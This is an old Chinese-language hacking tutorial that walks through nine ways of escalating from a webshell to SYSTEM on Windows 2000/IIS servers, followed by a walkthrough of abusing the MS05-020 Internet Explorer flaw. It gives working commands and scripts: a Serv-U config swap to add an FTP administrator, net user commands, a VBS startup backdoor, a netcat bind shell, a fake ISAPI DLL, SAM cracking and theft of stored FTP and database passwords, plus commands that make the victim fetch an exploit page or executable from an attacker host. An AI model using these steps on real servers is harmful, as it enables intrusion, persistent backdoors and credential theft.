第一
如果服務器上有裝了pcanywhere服務端,管理員爲了管理方便
也給了我們方便,到系統盤的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下載*.cif本地
破解就使用pcanywhere連接就ok了
****************************************************************************
第二
webshell的iis user權限提升
一般服務器的管理都是本機設計完畢然後上傳到空間裏,
那麼就會用到ftp,服務器使用最多的就是servu
那麼我們就利用servu來提升權限
通過servu提升權限需要servu安裝目錄可寫~
好開始把,首先通過webshell訪問servu安裝文件夾下的ServUDaemon.ini把他下載
下來,然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝文件夾下覆蓋,
啓動servu添加了一個用戶,設置爲系統管理員,目錄C:/,具有可執行權限
然後去servu安裝目錄裏把ServUDaemon.ini更換服務器上的。
用我新建的用戶和密碼連接~
好的,還是連上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //剛纔添加的用戶
331 User name okay, please send complete E-mail address as password.
Password:password //密碼
230 User logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄
250 Directory changed to /WINNT
ftp>cd system32 //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系統的net.exe
文件加用戶。
如果提示沒有權限,那我們就
把後門(server.exe) 傳他system32目錄
然後寫一個VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存爲xx.vbe
這個教本的作用是建立user用戶密碼爲pass
並且提升爲管理員
然後執行system32目錄下的server.exe
把這個教本傳他 C:/Documents and Settings/All Users/「開始」菜單/程序/啓動
目錄
這樣管理員只要一登陸就會執行那個教本.
接下來就是等了.等他登陸.
****************************************************************************
第三
就是先檢查有什麼系統服務,或者隨系統啓動自動啓動的程序和管理員經常使用的軟件, 比如諾頓,VAdministrator,金山,瑞星,WinRAR甚至QQ之類的,是否可以寫,如果可以就修改其程序, 綁定一個批處理或者VBS,然後還是等待服務器重啓。
****************************************************************************
第四
查找conn和config ,pass這類型的文件看能否得到sa或者mysql的相關密碼,可能會有所
收穫等等。
****************************************************************************
第五
使用Flashfxp也能提升權限,但是成功率就看你自己的運氣了
首先找到FlashFXP文件夾,打開(編輯)Sites. dat,這個文件這是什麼東西密碼和用戶名,
而且密碼是加了密的。 如果我把這些文件copy回本地也就是我的計算機中,替換我本地的相應文件。然後會發現 打開flashfxp在站點中打開站點管理器一樣。又可以添加N多肉雞啦~~嘻嘻~
唔??不對啊,是來提升權限的啊,暈,接着來別半途而廢。
大家看看對方管理員的這站點管理器,有用戶名和密碼,密碼是星號的。經過用xp星號密碼 查看器查看,然後和Sites.dat中加密了密碼做比較發現並未加密而是查到的密碼是明文顯示, 然後最終把這個網站管理員的密碼從這堆東西中找
出來。那麼下一步就可以鏈接這些新的服務器啦~~
經過測試只要把含有密碼和用戶名的Sites.dat文件替換到本地相應的文件就可以在本地
還原對方管理員的各個站點的密碼。
****************************************************************************
第六
WIN2K+IIS5.0默認情況下應用程序保護選項是"中(共用的)",這時IIS加載isapi是用的
iwam_computername用戶身份執行。
但默認情況下WIN2K+IIS5對於一些特殊isapi又要以system身份加載。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是簡單的判斷isapi的文件名,並且沒有做目錄限制,
以SYSTEM權限加載的isapi有:
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll
所
以利用這很容易得到SYSTEM權限。並且判斷文件名的時候有個bug,比如請求/scripts/test%81%5cssinc.dll也將會認爲是
請求的ssinc.dll,就是分離文件路徑的時候沒有考慮到雙字節的 遠東版問題。ssinc.dll在處理包含文件路徑的時候也有一個問題,就
是"/"、"/"只識別了一個 "/",所以如果請求裏面使用"/",就會錯誤的處理包含文件路徑,有可能泄露東西或者出現權限 漏洞,這種漏洞很多別的
地方( php、asp等)也還存在。
加載這些isapi不是單以文件名做依據了,而是加了路徑,應該是修正了此問題。
一般默認情況下是:
1、 idq.dll d:/winnt/system32/idq.dll
2、 httpext.dll d:/winnt/system32/inetsrv/httpext.dll
3、 httpodbc.dll d:/winnt/system32/inetsrv/httpodbc.dll
4、 ssinc.dll d:/winnt/system32/inrtsrv/ssinc.dll
5、 msw3prt.dll d:/winnt/system32/msw3prt.dll
6、 author.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/_vti_aut/author.dll
7、 admin.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/_vti_adm/admin.dll
8、 shtml.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/isapi/shtml.dll
9、 sspifilt.dll d:/winnt/system32/inetsrv/sspifilt.dll
10、compfilt.dll d:/winnt/system32/inetsrv/compfilt.dll
11、pwsdata.dll d:/winnt/system32/inetsrv/pwsdata.dll
12、md5filt.dll d:/winnt/system32/inetsrv/md5filt.dll
13、fpexedll.dll D:/Program Files/Common Files/Microsoft Shared/web server extensions/40/bin/fpexedll.dll
正常情況下這些路徑都guest不能寫,但如果配置不好,這些路徑iis user能夠寫了就一樣可以提升權限了
可以把ISAPIHack.dll上傳到IIS的可執行目錄,文件名可叫ssinc.dll或者admin.dll等(上面列的13個文件名之一)。
然後等待IIS重啓加載此dll,就可以獲得權限了
****************************************************************************
第七
下載系統的 %windir%/repair/sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件,
然後用L0pht等軟件進行破解,只要能拿到,肯花時間,就一定可以破解。
****************************************************************************
第八
PipeUpAdmin(Windows 2000下), 在本機運行可以把當前用戶帳號加入管理員組。普通用戶和Guests組用戶都可以成功運行。
****************************************************************************
第九
Serv-u Ftp Server 本地權限提升漏洞:
很
多主機的C:/Documents and Settings/All Users/ Documents目錄以及下邊幾個子目錄Documents沒有
設置權限,導致可以在這個目錄上傳並運行Exp. 直接上傳了serv-u local exploit 和nc, 並且把serv-u的本地提升權限的
名字命名爲su.exe 文件就放在C:/Documents and Settings/All Users/ Documents, 然後我們用
su.exe直接建立用戶,也可以反彈一個shell過來的。
具體命令:
建立用戶: serv-u.exe "cmd"
>USER xl
>PASS 111111
反彈shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
很不錯的提權新方法
今天我要帶給大家的是,當我們得到WEBSHELL後如何得到SYSTEM權限的新方法, 提升權限這個已經是老生常談了,網絡上已經有很多種提升權限的方法了,在這裏我就不在提了,今天我給大家介紹的是就是主動利用MS05020漏洞來達到我們提升權限的目的。
MS05020是一個IE漏洞,2005.4份的時候微軟就發步了這個公告:
安全漏洞CN-VA05-025
發佈日期:2005-04-13
漏洞類型:遠程執行代碼
漏洞評估:高危
受影響版本:
Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows Server 2003
Microsoft Windows Server 2003(用
於基於 Itanium 的系統)Microsoft Windows 98、
Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME) 測
試過的 Microsoft Windows 組件:
漏洞描述:
Internet Explorer 由於其處理某些 DHTML 對象
的方式而存在一個遠程執行代碼漏洞。 攻擊者可以通過構建惡意的網頁來利用該漏洞。 如果某個用戶訪問了惡意網站,此惡意網頁就可能允許遠程執行代
碼。 成功利用此漏洞的攻擊者可以完全控制受影響的系統。Internet Explorer 由於其處理某些 URL 的方式而存在一個遠程執行代碼漏
洞。 攻擊者可以通過構建惡意的網頁來利用該漏洞。 如果某個用戶訪問了惡意網站,此惡意網頁就可能允許遠程執行代碼。 成功利用此漏洞的攻擊者可以完全
控制受影響的系統。Internet Explorer 由於其處理分級審查文件的方法而存在一個遠程執行代碼漏洞。 攻擊者可以通過構造特製的分級審查
文件來利用此漏洞。 如果用戶訪問了惡意網站或查看了惡意的電子郵件,並接受安裝此惡意分級審查文件,則該文件可能允許遠程執行代碼。 成功利用此漏洞的
攻擊者可以完全控制受影響的系統。 不過,要利用此漏洞,需要進行大量用戶交互。
大家看到上面的漏洞描述了嗎?當被人瀏覽的時候纔會受到攻擊,平時我們利用IE漏洞都是先把有攻擊性的頁面放到網上,然後等待別人去瀏覽,這樣瀏覽者就會中招了。
今天我們要提升權限,那自然是讓我們要提升權限的主機去瀏覽存在漏洞的頁面了,那當我們得到WEBSHELL後怎麼才能讓主機去瀏覽這個頁面呢?
Ms05020的EXP網頁代碼已經出來了,大家可以到:
http://www.eviloctal.com/forum/read.php?tid=10127
去下載,假如我們已經把這個EXP放到http://www.xxxx.com/ms05020.html的地方,
下面我們開始利用這個EXP,進入到我們的ASP木馬,打開CMDSHELL,如果用不了的,大家自己想辦法解決(可以自己上傳一個CMD.EXE上去)。
在命令行裏輸入:start http://www.xxxx.com/ms05020.html 然後點執行。
這個時候主機的IE就會去訪問我們的這個MS05020.HTML,那麼如果主機沒有打撲釘的話,就會綁定一個28876的斷口在主機上。
接着我們輸入:netstat -an | find "28876" 看看是否成功綁定,第一次的話,會慢一些,大家要等待一下,我這裏很快就成功了。然後我們telnet上去馬上就成功了
大家看到了:(我添加了一個temp的管理員)
現在我們已經拿到SYSTEM權限了 ,大家還想幹什麼不可以?
後記:其實大家還可以先上傳NC,然後連接到本地後,再輸入:
start http://www.xxx.com/ms05020.html也是可以的。
還有就是如果可以的話還可以這樣輸入:
start "C:/Program Files/Internet Explorer/icxplore.exe" http://www.xxx.com/ms05020.htm
這個要看你的情況了,一般虛擬主機如果允許訪問的話,那還是用第一個命令好了!
我
測試過在2K pro、 2K server(2000 Enterprise Terminal Server) 、2003都成功過!不過也有不成功
的時候,而且不成功的概率很大,特別是到虛擬機的時候,有一次我沒有成功,然後我開了3389進入,發現IE沒有彈出來,而是出來了一個IE設置嚮導,也
就是說這個服務器沒有對IE進行網絡設置IE是無法訪問網絡的,艾,其實我現在也沒有搞清楚是怎麼會事有點能成功有點不行,想也想不通,因爲
start ist:http://www.xxx.com/xxx.exe總是能成功!
把XXX。EXE下載到它的電腦上面!我最後認爲估計這
個還是和MS05020.HTM這個文件有關。艾,看來這個方法的利用價值也很小了,本來不想發出來了的,既然寫出來了,還是發表出來一下吧!剛剛和無敵
討論了一下,他也是說不成功的原因估計也是這個,還有就是系統打了IE補丁。
